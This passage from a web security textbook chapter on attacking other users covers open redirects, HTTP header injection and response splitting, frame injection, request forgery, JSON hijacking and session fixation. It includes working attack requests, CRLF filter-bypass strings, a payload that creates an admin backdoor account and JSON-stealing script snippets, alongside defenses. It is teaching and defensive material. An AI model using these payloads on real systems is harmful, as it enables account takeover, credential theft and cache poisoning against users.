include a slash character after the domain name, then it is vulnerable. For

example, the URL

http://wahh-app.com/redir.php?target=.wahh-attacker.com

will cause a redirect to

http://wahh-app.com.wahh-attacker.com

which is under the control of the attacker, assuming that he controls the DNS

records for the domain

wahh-attacker.com.

If, however, the absolute URL prefix does include a trailing slash, or a sub-

directory on the server, then the application is probably not vulnerable to a

redirection attack aimed at an external domain. The best an attacker can prob-

ably achieve is to frame a URL that redirects a user to a different URL within

the same application. This attack does not normally accomplish anything,

because if the attacker is able to induce a user to visit one URL within the

application, then he can presumably just as easily feed the second URL to them

directly.

NOTE In cases where the redirect is initiated using client-side JavaScript that

queries data from the DOM, the entire code responsible for performing the

redirect and any associated validation is typically visible on the client. This

should be closely reviewed to determine how user-controllable data is being

incorporated into the URL, whether any validation is being performed, and if so,

whether any bypasses exist to the validation. Bear in mind that as with DOM-

based XSS, some additional validation may be performed on the server prior to

the script being returned to the browser. The following JavaScript APIs may be

used to perform redirects:

■■

document.location

■■

document.URL

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 432

■■

document.open()

■■

window.location.href

■■

window.navigate()

■■

window.open()

Preventing Redirection Vulnerabilities

The most effective way to avoid arbitrary redirection vulnerabilities is to not

incorporate user-supplied data into the target of a redirect at all. There are var-

ious reasons why developers are inclined to use this technique, but there are

usually alternatives available. For example, it is common to see a user interface

that contains a list of links, each pointing to a redirection page and passing a

target URL as a parameter. Here, possible alternative approaches include the

following:

■■

Remove the redirection page from the application, and replace links to

it with direct links to the relevant target URLs.

■■

Maintain a list of all valid URLs for redirection. Instead of passing the

target URL as a parameter to the redirect page, pass an index into this

list. The redirect page should look up the index in its list and return a

redirect to the relevant URL.

If it is considered unavoidable for the redirection page to receive user-

controllable input and incorporate this into the redirect target, one of the fol-

lowing measures should be used to minimize the risk of redirection attacks:

■■

The application should use relative URLs in all of its redirects, and the

redirect page should strictly validate that the URL received is a relative

URL. It should verify that the user-supplied URL either begins with a

single slash followed by a letter or begins with a letter and does not

contain a colon character before the first slash. Any other input should

be rejected, not sanitized.

■■

The application should use URLs relative to the web root for all of its

redirects, and the redirect page should prepend

http://yourdomainname

.com

to all user-supplied URLs before issuing the redirect. If the user-

supplied URL does not begin with a slash character, it should instead be

prepended with

http://yourdomainname.com/.

■■

The application should use absolute URLs for all redirects, and the

redirect page should verify that the user-supplied URL begins with

http://yourdomainname.com/ before issuing the redirect. Any other

input should be rejected.

Chapter 12 ■ Attacking Other Users 433

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 433

As with DOM-based XSS vulnerabilities, it is recommended that applica-

tions do not perform redirects via client-side scripts on the basis of DOM data,

as this data is outside of the server’s direct control.

HTTP Header Injection

HTTP header injection vulnerabilities arise when user-controllable data is

inserted in an unsafe manner into an HTTP header returned by the applica-

tion. If an attacker can inject newline characters into the header he controls, he

can insert additional HTTP headers into the response and can write arbitrary

content into the body of the response.

This vulnerability arises most commonly in relation to the

Location and

Set-Cookie headers, but it may conceivably occur for any HTTP header. You

saw previously how an application may take user-supplied input and insert

this into the

Location header of a 3xx response. In a similar way, some appli-

cations take user-supplied input and insert this into the value of a cookie. For

example:

GET /home.php?uid=123 HTTP/1.1

Host: wahh-app.com

HTTP/1.1 200 OK

Set-Cookie: UserId=123

...

In either of these cases, it may be possible for an attacker to construct a

crafted request using the carriage-return (

0x0d) and/or line-feed (0x0a) char-

acters to inject a newline into the header they control, and so insert further

data on the following line. For example:

GET /home.php?uid=123%0d%0aFoo:+bar HTTP/1.1

Host: myapp.com

HTTP/1.1 200 OK

Set-Cookie: UserId=123

Foo: bar

...

Exploiting Header Injection Vulnerabilities

Potential header injection vulnerabilities can be detected in a similar way to

XSS vulnerabilities, since you are looking for cases where user-controllable

input reappears anywhere within the HTTP headers returned by the applica-

tion. Hence, in the course of probing the application for XSS vulnerabilities,

434 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 434

you should also identify any locations where the application may be vulnera-

ble to header injection.

HACK STEPS

■ For each potentially vulnerable instance in which user-controllable input

is copied into an HTTP header, verify whether the application accepts

data containing URL-encoded carriage-return (%0d) and line-feed (%0a)

characters, and whether these are returned unsanitized in its response.

■ Note that you are looking for the actual newline characters themselves to

appear in the server’s response, not their URL-encoded equivalents. If

you view the response in an intercepting proxy, you should actually see

an additional line in the HTTP headers if the attack was successful.

■ If only one of the two newline characters is returned in the server’s

responses, it may still be possible to craft a working exploit, depending

on the context.

■ If you find that newline characters are being blocked or sanitized by the

application, then the following bypasses should be attempted:

foo%00%0d%0abar

foo%250d%250abar

foo%%0d0d%%0a0abar

If it is possible to inject arbitrary headers and message body content into the

response, then this behavior can be used to attack other users of the applica-

tion in various ways.

Injecting Cookies

A URL can be constructed that sets arbitrary cookies within the browser of any

user who requests it. For example:

GET /redir.php?target=/%0d%0aSet-cookie:+SessId%3d120a12f98e8; HTTP/1.1

Host: wahh-app.com

HTTP/1.1 302 Object moved

Location: /

Set-cookie: SessId=120a12f98e8;

If suitably configured, these cookies may persist across different browser

sessions. Target users can be induced to access the malicious URL via the same

delivery mechanisms that were described for reflected XSS vulnerabilities

(email, third-party web site, etc.).

Chapter 12 ■ Attacking Other Users 435

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 435

Depending on the application, setting a particular cookie may interfere

with the application’s logic to the disadvantage of the user (for example,

UseHttps=false). Also, setting an attacker-controlled session token may be

used to perform a session fixation attack (described later in this chapter).

Delivering Other Attacks

Because HTTP header injection enables an attacker to control the entire body

of a response, it can be used as a delivery mechanism for practically any attack

against other users, including virtual web site defacement, script injection,

arbitrary redirection, attacks against ActiveX controls, and so on.

HTTP Response Splitting

This is an attack technique which seeks to poison a proxy server’s cache with

malicious content, in order to compromise other users who access the applica-

tion via the proxy. For example, if all users on a corporate network access an

application via a caching proxy, the attacker can target them by injecting mali-

cious content into the proxy’s cache, which will be displayed to any users who

request the affected page.

A header injection vulnerability can be exploited to deliver a response split-

ting attack using the following steps:

1. The attacker chooses a page of the application that he wishes to poison

within the proxy cache. For example, he might replace the page at

/admin/ with a Trojan login form that submits the user’s credentials to

the attacker’s server.

2. The attacker locates a header injection vulnerability and formulates a

request that injects an entire HTTP body into the response, plus a sec-

ond set of response headers, and a second response body. The second

response body contains the HTML source code for his Trojan login

form. The effect is that the server’s response looks exactly like two sep-

arate HTTP responses chained together. Hence the name of the attack

technique, because the attacker has effectively “split” the server’s

response into two separate responses. For example:

GET /home.php?uid=123%0d%0aContent-Length:+22%0d%0a%0d%0a<html>%0d%

0afoo%0d%0a</html>%0d%0aHTTP/1.1+200+OK%0d%0aContent-Length:

+2307%0d%0a%0d%0a<html>%0d%0a<head>%0d%0a<title>Administrator+login

</title>0d%0a[...long URL...] HTTP/1.1

Host: wahh-app.com

436 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 436

HTTP/1.1 200 OK

Set-Cookie: UserId=123

Content-Length: 22

<html>

foo

</html>

HTTP/1.1 200 OK

Content-Length: 2307

<html>

<head>

<title>Administrator login</title>

...

3. The attacker opens a TCP connection to the proxy server and sends his

crafted request followed immediately by a request for the page to be

poisoned. Pipelining requests in this way is legal in the HTTP protocol:

GET http://wahh-app.com/home.php?uid=123%0d%0aContent-Length:+22%0d

%0a%0d%0a<html>%0d%0afoo%0d%0a</html>%0d%0aHTTP/1.1+200+OK%0d%

0aContent-Length:+2307%0d%0a%0d%0a<html>%0d%0a<head>%0d%0a

<title>Administrator+login</title>0d%0a[...long URL...] HTTP/1.1

Host: wahh-app.com

Proxy-Connection: Keep-alive

GET http://wahh-app.com/admin/ HTTP/1.1

Host: wahh-app.com

Proxy-Connection: Close

4. The proxy server opens a TCP connection to the application, and sends

the two requests pipelined in the same way.

5. The application responds to the first request with the attacker’s injected

HTTP content, which looks exactly like two separate HTTP responses.

6. The proxy server receives these two apparent responses, and interprets

the second as being the response to the attacker’s second pipelined

request, which was for the URL

http://wahh-app/admin/. The proxy

caches this second response as the contents of this URL. (If the proxy

has already stored a cached copy of the page, the attacker can cause it

to re-request the URL and update its cache with the new version by

inserting an appropriate

If-Modified-Since header into his second

request and a

Last-Modified header into the injected response.)

Chapter 12 ■ Attacking Other Users 437

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 437

7. The application issues its actual response to the attacker’s second

request, containing the authentic contents of the URL

http://wahh-

app.com/admin/

. The proxy server does not recognize this as being a

response to a request that it has actually issued, and so discards it.

8. A user accesses

http://wahh-app/admin/ via the proxy server and

receives the content of this URL which was stored in the proxy’s cache.

This content is in fact the attacker’s Trojan login form, so the user’s cre-

dentials are compromised.

Preventing Header Injection Vulnerabilities

The most effective way to prevent HTTP header injection vulnerabilities is to

not insert user-controllable input into the HTTP headers returned by the appli-

cation. As you saw with arbitrary redirection vulnerabilities, there are usually

safer alternatives available to this behavior.

If it is considered unavoidable to insert user-controllable data into HTTP

headers, the application should employ a twofold defense-in-depth approach

to prevent any vulnerabilities arising:

■■

Input validation — The application should perform context-dependent

validation of the data being inserted, in as strict a manner as possible.

For example, if a cookie value is being set based on user input, it may

be appropriate to restrict this to alphabetical characters only, and a max-

imum length of six bytes.

■■

Output validation — Every piece of data being inserted into headers

should be filtered to detect potentially malicious characters. In practice,

any character with an ASCII code below 0x20 should be regarded as

suspicious, and the request should be rejected.

Applications can prevent any remaining header injection vulnerabilities

from being used to poison proxy server caches by using HTTPS for all appli-

cation content.

Frame Injection

Frame injection is a relatively simple vulnerability that arises from the fact that

in many browsers, if a web site creates a named frame, then any window

opened by the same browser process is permitted to write the contents of that

frame, even if its own content was issued by a different web site.

438 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 438

NOTE The latest versions of most browsers have modified their behavior in

relation to named frames and, by default, extend the same origin policy to

prevent one web site from writing the content of a frame that was issued by a

different domain. As users gradually migrate to the latest browsers, this

category of vulnerability will cease to be relevant.

HACK STEPS

■ If the application uses frames, review the HTML source of the main

browser window, which should contain the code for the frameset.

■ If the frameset assigns a name to each frame, it is probably vulnerable,

as in the following example, indicated by the presence of the name

attribute in the tag that creates each frame:

<frame src=”top_menu.asp” name=”top_menu”

frameborder=”yes” title=”Top menu”>

<frame src=”left_menu.asp” name=”left_menu”

frameborder=”yes” title=”Left menu”>

<frame src=”main_display.asp” name=”main_display”

frameborder=”yes” title=”Main display”>

</frameset>

■ If the frameset uses named frames, but the names appear to be highly

cryptic or random, access the application several times from different

browsers, and review whether the frame names change. If they do so,

and there is no way for an attacker to predict the names of other users’

frames, then the application is probably not vulnerable.

Exploiting Frame Injection

If the application is vulnerable to frame injection, then an attacker can exploit

this using the following steps:

1. The attacker creates an innocuous-looking web site containing a script

that wakes up every 10 seconds and attempts to overwrite the contents

of the frame named

main_display. The new content is hosted on the

attacker’s site and contains Trojan functionality that looks identical to

the normal

wahh-app.com content, but transmits any entered data to the

attacker.

2. The attacker either waits for

wahh-app.com users to browse to his

innocuous site, or uses some proactive means of inducing them to do

so, such as sending emails, buying banner ads, and so on.

Chapter 12 ■ Attacking Other Users 439

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 439

3. A user browses the attacker’s innocuous-looking web site. If the user is

simultaneously using

wahh-app.com, or does so while the attacker’s site

is being displayed in another browser window, then the attacker’s Tro-

jan content will overwrite the frame

main_display in the wahh-app.com

window. If the user continues using what appears to be the wahh-app

.com

application, then any data he enters will be submitted to the

attacker.

This type of attack bears similarities to phishing attacks in which the

attacker constructs a cloned web site and seeks to entice unwitting users to

access it. However, in the case of frame injection, the attack is more sophisti-

cated and much more convincing, because the cloned content actually replaces

the authentic content within a browser window whose URL still points to the

genuine application.

If the application being targeted uses HTTPS, then the attack will still suc-

ceed, and the security padlock displayed by the browser window will con-

tinue to show the correct certificate for

wahh-app.com. This is because when a

browser displays a frameset, the security information for the main window

relates to the page containing the frameset, which in this case still originates

from

wahh-app.com. Hence, even a well-informed user may not notice an

attack of this kind.

Preventing Frame Injection

There are two available mitigations to frame injection vulnerabilities:

■■

If there is no requirement for the application’s different frames to inter-

communicate, remove frame names altogether and make them anony-

mous. However, because intercommunication is normally required, this

option is usually not feasible.

■■

Use named frames but make them unique to each session and unpre-

dictable. One possible option is to append the user’s session token to

each base frame name such as

main_display.

Request Forgery

This category of attack (also known as session riding) is closely related to ses-

sion hijacking attacks, in which an attacker captures a user’s session token and

so is able to use the application “as” that user. With request forgery, however,

the attacker need never actually know the victim’s session token. Rather, the

attacker exploits the normal behavior of web browsers in order to hijack a

440 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 440

user’s token, causing it to be used to make requests that the user does not

intend to make.

Request forgery vulnerabilities come in two flavors: on-site and cross-site.

On-Site Request Forgery

On-site request forgery (OSRF) is a familiar attack payload for exploiting

stored XSS vulnerabilities. In the MySpace worm, Samy placed a script within

his profile that caused any user viewing the profile to perform various unwit-

ting actions. What is often overlooked is that stored OSRF vulnerabilities can

exist even in situations where XSS is not possible.

Consider a message board application that lets users submit items that are

viewed by other users. Messages are submitted using a request like the

following:

POST /submit.php

Host: wahh-app.com

Content-Length: 34

type=question&name=daf&message=foo

This request results in the following being added to the messages page:

<tr>

</tr>

In this situation, you would of course test for XSS flaws. However, suppose

that the application is properly HTML-encoding any

“ < and > characters that

it inserts into the page. Having satisfied yourself that this defense cannot be

bypassed in any way, you might move on to the next test.

But look again. You control part of the target of the

<img> tag. Although you

cannot break out of the quoted string, you can modify the URL to cause any

user who views your message to make an arbitrary on-site

GET request. For

example, submitting the following value in the

type parameter will cause any-

one viewing your message to make a request that attempts to add a new

administrative user:

../admin/newUser.php?username=daf2&password=0wned&role=admin#

When an ordinary user is induced to issue your crafted request, it will of

course fail. But when an administrator views your message, your backdoor

account gets created. You have performed a successful OSRF attack even

Chapter 12 ■ Attacking Other Users 441

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 441

442 Chapter 12 ■ Attacking Other Users

though XSS was not possible. And of course, the attack will succeed even if

administrators take the precaution of disabling JavaScript.

In the preceding attack string, note the

# character that effectively termi-

nates the URL before the

.gif suffix. You could just as easily use & to incorpo-

rate the suffix as a further request parameter.

HACK STEPS

■ In every location where data submitted by one user is displayed to other

users but you are unable to perform a stored XSS attack, review whether

the application’s behavior leaves it vulnerable to OSRF.

■ The vulnerability typically arises where user-supplied data is inserted

into the target of a hyperlink or other URL within the returned page.

Unless the application specifically blocks any characters you require (typ-

ically dots, slashes, and the delimiters used in the query string), it is

almost certainly vulnerable.

■ If you discover an OSRF vulnerability, look for a suitable request to target

in your exploit, as described in the next section for XSRF.

OSRF vulnerabilities can be prevented by validating user input as strictly as

possible before it is incorporated into responses. For example, in the specific

case described, the application could verify that the

type parameter has one of

a specific range of values. If the application must accept other values that it

cannot anticipate in advance, then input containing any of the characters

/ .

\ ? &

and = should be blocked.

Note that HTML-encoding these characters is not an effective defense

against OSRF attacks, because browsers will decode the target URL string

before it is requested.

Depending on the insertion point and the surrounding context, it may also

be possible to prevent OSRF attacks using the same defenses described in the

next section for XSRF attacks.

Cross-Site Request Forgery

Cross-site request forgery (XSRF) involves a similar delivery mechanism to the

frame injection attack described earlier. However, XSRF does not involve the

attacker presenting any spoofed content to the user. Rather, the attacker creates

an innocuous-looking web site that causes the user’s browser to submit a

request directly to the vulnerable application, to perform some unintended

action that is beneficial to the attacker.

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 442

Recall that the browser’s same origin policy does not prohibit one web site

from issuing requests to a different domain. It does, however, prevent the orig-

inating web site from processing the responses to cross-domain requests.

Hence, unlike its on-site counterpart, XSRF attacks are “one-way” only. It

would not be possible to perform the multistage actions of the Samy worm in

a pure XSRF attack.

One well-known example of an XSRF flaw was found in the eBay applica-

tion by Dave Armstrong in 2004. It was possible to craft a URL that caused the

requesting user to make an arbitrary bid on an auction item. A third-party web

site could cause visitors to request this URL, so that any eBay user who visited

the web site would place a bid. Further, with a little work, it was possible to

exploit the vulnerability in a stored OSRF attack within the eBay application

itself. The application allowed users to place

<img> tags within auction

descriptions. To defend against attacks, the application validated that the tar-

get of the tag returned an actual image file. However, it was possible to place

a link to an off-site server that returned a legitimate image at the time the auc-

tion item was created, and subsequently replace this image with an HTTP redi-

rect back to the crafted XSRF URL. Thus, anyone who viewed the auction item

would unwittingly place a bid on it. More details can be found in the original

Bugtraq post:

http://archive.cert.uni-stuttgart.de/bugtraq/2005/04/msg00279.html

NOTE The defect in the application’s validation of off-site images is known as

a “time of check, time of use” (TOCTOU) flaw, because an item is validated at

one time and used at another time, and an attacker can modify its value in the

window between these.

Exploiting XSRF Flaws

XSRF vulnerabilities primarily arise where HTTP cookies are used to transmit

session tokens. Once an application has set a cookie in a user’s browser, their

browser will automatically submit that cookie back to the application in every

subsequent request. This is so regardless of whether the request originates

from a link provided by the application itself or from a URL received from

elsewhere, such as in an email or on another web site altogether, or from any

other source. If the application does not take precautions against misuse of the

token in this way, then it is vulnerable to XSRF.

Chapter 12 ■ Attacking Other Users 443

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 443

444 Chapter 12 ■ Attacking Other Users

HACK STEPS

■ Review the key functionality within the application, as enumerated in

your application mapping exercises (see Chapter 4).

■ Find an application function that (a) can be used to perform some sensi-

tive action on behalf of an unwitting user and (b) employs request para-

meters which an attacker can fully determine in advance — that is, which

do not contain any session tokens or other unpredictable items. For

example:

POST /TransferFunds.asp HTTP/1.1

Host: wahh-app.com

FromAccount=current&ToSortCode=123456&ToAccountNumber=

12345678&Amount=1000.00&When=now

■ Create an HTML page that will issue the desired request without any user

interaction. For GET requests, you can place an <img> tag with the src

parameter set to the vulnerable URL. For POST requests, you can create a

form that contains hidden fields for all of the relevant parameters

required for the attack and has its target set to the vulnerable URL. You

can use JavaScript to auto-submit the form as soon as the page loads.

■ While logged in to the application, use the same browser to load your

crafted HTML page. Verify that the desired action is carried out within the

application.

Preventing XSRF Flaws

XSRF vulnerabilities arise because of the way browsers automatically submit

cookies back to the issuing web server with each subsequent request. If a web

application relies solely upon HTTP cookies as its mechanism for transmitting

session tokens, then it is inherently at risk from this type of attack.

XSRF attacks can be prevented by not relying only upon cookies in this way.

In the most security-critical applications, such as online banks, it is usual to see

some session tokens being transmitted via hidden fields in HTML forms.

When each request is submitted, in addition to validating session cookies, the

application verifies that the correct tokens were received in the form submis-

sion. If an application behaves in this way, then an attacker will not be able to

mount a XSRF attack without already knowing the value of the tokens being

transmitted in hidden fields. To be successful, the attacker will already need to

have hijacked the user’s session, making any XSRF attack unnecessary.

Do not make the mistake of relying upon the HTTP

Referer header to indi-

cate whether a request originated on-site or off-site. The

Referer header can be

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 444

spoofed using older versions of Flash or masked altogether using a meta

refresh tag. In general, the

Referer header is not a reliable foundation on

which to build any security defenses within web applications.

An anti-XSRF safeguard employed in some applications is to require that

users complete multiple steps in order to carry out sensitive actions such as

funds transfers. If this is done, then to be effective the application must employ

some kind of token or nonce within the multistep process. Typically, at the first

stage, the application places a token into a hidden form field, and at the second

stage, it verifies that the same token has been submitted. Because XSRF attacks

are one-way, the attacking web site cannot retrieve the token from the first

stage in order to submit it at the second. If the application uses two steps with-

out the safeguard of a token, then the defense achieves nothing because an

XSRF attack can simply issue the two required requests in turn, or (very often)

proceed directly to the second request.

Defeating Anti-XSRF Defenses via XSS

It is often said that anti-XSRF defenses can be defeated if the application contains

any XSS vulnerabilities. But this is only partly true. The thought behind this the-

ory is correct — that because XSS payloads execute on-site, they can perform

two-way interaction with the application, and so can retrieve tokens from the

application’s responses and submit them in subsequent requests. However, if a

page that is itself protected by anti-XSRF defenses also contains a reflected XSS

flaw, then this flaw cannot be used to break the defenses. Don’t forget that the ini-

tial request in a reflected XSS attack is itself cross-site. The attacker crafts a URL

POST request containing malicious input that gets copied into the applica-

tion’s response. But if the vulnerable page implements anti-XSRF defenses, then

the attacker’s crafted request must already contain the required token in order to

succeed. If it does not, the request will be rejected and the code path containing

the reflected XSS flaw will not execute. The issue here is not about whether

injected JavaScript can read any tokens contained in the application’s response

(of course it can), but rather about getting the JavaScript into a response con-

taining those tokens in the first place.

In general, there are two situations in which XSS vulnerabilities can be

exploited to defeat anti-XSRF defenses:

■■

If there are any stored XSS flaws within the defended functionality,

these can always be exploited to defeat the defenses. JavaScript injected

via the stored attack can directly read the tokens contained within the

same response that the script appears in.

■■

If the application employs anti-XSRF defenses for only part of its

authenticated functionality, and a reflected XSS flaw exists in a function

that is not defended against XSRF, then that flaw can be exploited to

Chapter 12 ■ Attacking Other Users 445

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 445

defeat the anti-XSRF defenses. For example, if an application employs

anti-XSRF tokens to protect only the second step of a funds transfer

function, then an attacker can leverage a reflected XSS attack elsewhere

to defeat the defense. A script injected via this flaw can make an on-site

request for the first step of the funds transfer, retrieve the token, and

use this to request the second step. The attack is successful because the

first step of the transfer, which is not defended against XSRF, returns

the token needed to access the defended page. The reliance on only

HTTP cookies to reach the first step means that it can be leveraged to

gain access to the token defending the second step.

JSON Hijacking

JSON hijacking is a special version of an XSRF attack, which in certain circum-

stances can violate the objectives of the browser’s same origin policy. It enables

a malicious web site to retrieve and process data from a different domain,

thereby circumventing the “one-way” restriction that normally applies to

XSRF.

The possibility of JSON hijacking arises because of a quirk in the same ori-

gin policy. Recall that browsers treat JavaScript as code, not data — they allow

one web site to retrieve and execute code from a different domain. When the

cross-domain code executes, it is treated as having originated from the invok-

ing web site, and executes in that context. The reason this quirk can lead to vul-

nerabilities is that many of today’s complex web applications use JavaScript

for transmission of data, in a way that was not foreseen when the same origin

policy was devised.

JSON

JSON (JavaScript Object Notation) is a simple data transfer format that can be

used to serialize arbitrary data and can be processed directly by JavaScript

interpreters. It is commonly employed in Ajax applications as an alternative to

the XML format originally used for data transmission. In a typical situation,

when a user performs an action, client-side JavaScript uses

XMLHttpRequest to

communicate the action to the server. The server returns a lightweight

response containing data in JSON format. The client-side script then processes

this data and updates the user interface accordingly.

For example, an Ajax-based web mail application may contain a panel

allowing users to tab between different data. When a user clicks the Contacts

446 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 446

tab, the browser uses XMLHttpRequest to retrieve the user’s personal contacts,

which are returned using JSON:

[

[ ‘Jeff’, ‘1741024918’, ‘[email protected]’ ],

[ ‘C Gillingham’, ‘3885193114’, ‘[email protected]’ ],

[ ‘Mike Kemp’, ‘8041148671’, ‘[email protected]’ ],

[ ‘Wade A’, ‘5078782513’, ‘[email protected]’ ]

]

The returned message contains valid JavaScript syntax that defines an array.

The client-side script uses the JavaScript interpreter to construct the array and

then processes its contents.

Attacks against JSON

Because JavaScript is being used to transmit data, rather than pure code, the

possibility arises for a malicious web site to exploit the same origin policy’s

handling of JavaScript and gain access to data generated by other applications.

This attack involves an XSRF request, as described previously. However, in the

present case, it may be possible for the malicious site to read the data returned

in the cross-site response, thereby performing two-way interaction with the

target application.

Of course, it is not possible for a malicious web site to simply load a script

from a different domain and view its contents. That would still violate the

same origin policy, regardless of whether the response in question contains

JavaScript or other content. Rather, the malicious web site uses a

<script> tag

to include the target script and execute it within its own page. With a bit of

work, by actually executing the included script, the malicious site can gain

access to the data it contains.

At the time of this writing, there are two known ways in which a malicious

site can perform this trick: by overriding the default array constructor or by

implementing a suitable callback function.

Overriding the Array Constructor

If the JSON data returned by the target application contains a serialized array,

the malicious web site can override the default constructor for arrays in order

to gain access to the JSON data when the array is constructed. This attack can

be performed as follows in the Firefox browser:

function capture(s) {

alert(s);

}

Chapter 12 ■ Attacking Other Users 447

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 447

function Array() {

for (var i = 0; i < 3; i++)

this[i] setter = capture;

}

</script>

This proof-of-concept attack performs three key actions:

■■

It implements a function called capture, which simply generates an

alert displaying any data passed to it.

■■

It overrides the Array object and defines the setter for the first three ele-

ments in the array to be the

capture function.

■■

It includes the target JSON object within the page by setting the rele-

vant URL as the

src attribute of a <script> tag.

When this attack is executed, the target of the

executed. The serialized object, which is a multidimensional array containing

the victim user’s contacts, is constructed. When each element in the array is

set, the overridden setter is invoked, enabling the attacker’s script to capture

the contents of the element. In the example, the script simply displays a series

of alerts containing the array data.

This exact vulnerability was discovered within the GMail application by

Jeremiah Grossman in 2006. In other instances, attacks can override

Object

rather than Array, with the same effect.

Implementing a Callback Function

In some applications, the JavaScript returned by the vulnerable application

does not contain only a JSON object, but also invokes a callback function on

that object. For example:

showContacts(

[

[ ‘Jeff’, ‘1741024918’, ‘[email protected]’ ],

[ ‘C Gillingham’, ‘3885193114’, ‘[email protected]’ ],

[ ‘Mike Kemp’, ‘8041148671’, ‘[email protected]’ ],

[ ‘Wade A’, ‘5078782513’, ‘[email protected]’ ]

]);

This technique is often used in mash-ups in which one application includes

a JSON object from another domain, and specifies a call-back function in its

request for the script. The returned script invokes the specified call-back func-

tion on the JSON object, enabling the invoking application to process the data

in arbitrary ways.

448 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 448

Because this mechanism is specifically designed to work around the

browser’s same origin restrictions, it can of course be abused by an attacker to

capture data returned from other domains. In the example shown, an attack

simply needs to implement the

showContacts function and include the target

script. For example:

function showContacts(a) {

alert(a);

}

</script>

showContacts”></script>

Finding JSON Hijacking Vulnerabilities

Because JSON hijacking is a species of cross-site request forgery, some

instances of it can be identified using the same methodology as was described

for XSRF. However, because JSON hijacking allows you to retrieve arbitrary

data from another domain, and not only perform cross-domain actions, you

are interested in a different range of functionality than you are when probing

for standard XSRF flaws.

HACK STEPS

■ If the application uses Ajax, look for any instances where a response

contains sensitive data in JSON format or other JavaScript.

■ As with standard XSRF, determine whether it is possible to construct a

cross-domain request to retrieve the data. If the request does not contain

any unpredictable parameters, then the application may be vulnerable.

■ JSON hijacking attacks can only be performed using the GET method,

because this is the method used when a URL specified in a <script>

include is retrieved. If the application’s own request uses the POST

method, determine whether the request is still accepted when you

change the method to GET and move the body parameters to the URL

query string.

■ If the preceding requirements are met, determine whether you can con-

struct a web page that will succeed in gaining access to the target appli-

cation’s response data, by including it via a <script> tag. Try the two

techniques described, or any others that may be appropriate in unusual

situations.

Chapter 12 ■ Attacking Other Users 449

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 449

Preventing JSON Hijacking

As already described, there are several preconditions that must be in place

before a JSON hijacking attack can be performed. To prevent such attacks, it is

necessary to violate at least one of these preconditions.

At the time of this writing, each of the following countermeasures should be

sufficient to frustrate a JSON hijacking attack. However, research into these

attacks is thriving. To provide defense-in-depth, it is recommended that mul-

tiple precautions are implemented jointly.

■■

The application should use standard anti-XSRF defenses to prevent

cross-domain requests for sensitive data. Requests for JSON objects

should include an unpredictable parameter that is verified before the

data is returned.

■■

When an application retrieves JSON objects from its own domain, it is

not restricted to using

request is on-site, client-side code can use

XMLHttpRequest to gain

unfettered access to the response data and perform additional process-

ing on it before it is interpreted as JavaScript. This means that the appli-

cation can insert invalid or problematic JavaScript at the start of the

response, which the client application removes before it is processed.

This is how Google prevented the attack described against GMail, by

inserting the following at the start of the returned script:

while(1);

■■

Because the application can use XMLHttpRequest to retrieve JSON data,

it can use

POST requests to do so. If the application accepts only POST

requests for JSON objects, it will prevent third-party sites from includ-

ing them via

<script> tags.

Session Fixation

Session fixation vulnerabilities typically arise when an application creates an

anonymous session for each user when they first access the application. If the

application contains a login function, this anonymous session will be created

prior to login and then upgraded to an authenticated one after they have

logged in. The same token that initially confers no special access later allows

privileged access within the security context of the authenticated user.

In a standard session hijacking attack, the attacker must use some means to

capture the session token of an application user. In a session fixation attack, on

the other hand, the attacker first obtains an anonymous token directly from the

450 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 450

application, and uses some means to fix this token within a victim’s browser.

After the user has logged in, the attacker can use the token to hijack the user’s

session.

The steps involved in a successful session fixation attack are illustrated in

Figure 12-10.

Figure 12-10: The steps involved in a session fixation attack

The key stage in this attack is of course the point at which the attacker feeds

to the victim the session token that he has acquired, thereby causing the vic-

tim’s browser to use it. There are various techniques that the attacker may use

to fix a specific token for a target user, depending upon the mechanism used

by the application for transmitting session tokens. The two most common

techniques are:

■■

Where an application transmits session tokens within a URL parameter,

the attacker can simply feed the victim the same URL that was issued to

him by the application, for example:

https://wahh-app.com/login.php?SessId=12d1a1f856ef224ab424c2454208

■■

Where an application transmits session tokens using HTTP cookies or

hidden fields in HTML forms, the attacker can exploit a known XSS or

header injection vulnerability to set these values within the user’s

Application

3. User logs in using the token

received from the attacker

2. Attacker feeds the session token to the user

4. Attacker hijacks user’s session

using the same token as the user

1. Attacker requests /login.php

and is issued a session token

ser Attacker

Chapter 12 ■ Attacking Other Users 451

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 451

browser. In the case of cookies, this attack will succeed in hijacking the

user’s session even against applications that issue

HttpOnly cookies,

and so where cookies cannot be straightforwardly captured via an XSS

attack.

In both of these cases, the same various mechanisms for delivering the

attack are available as were described previously for reflected XSS.

Session fixation vulnerabilities can also exist in applications that do not con-

tain login functionality. For example, an application may allow anonymous

users to browse a catalog of products, place items into a shopping cart, check

out by submitting personal data and payment details, and then review all of

this information on a Confirm Order page. In this situation, an attacker may fix

an anonymous session token with the browser of a victim, wait for that user to

place an order and submit sensitive information, and then access the Confirm

Order page using the token, to capture the user’s details.

Some web applications and web servers accept arbitrary tokens submitted

by users, even if these were not previously issued by the server itself. When an

unrecognized token is received, the server simply creates a new session for the

token, and handles it exactly as if it were a new token generated by the server.

Microsoft IIS and Allaire ColdFusion servers have been vulnerable to this

weakness in the past.

When an application or server behaves in this way, attacks based on session

fixation are made considerably easier because the attacker does not need to

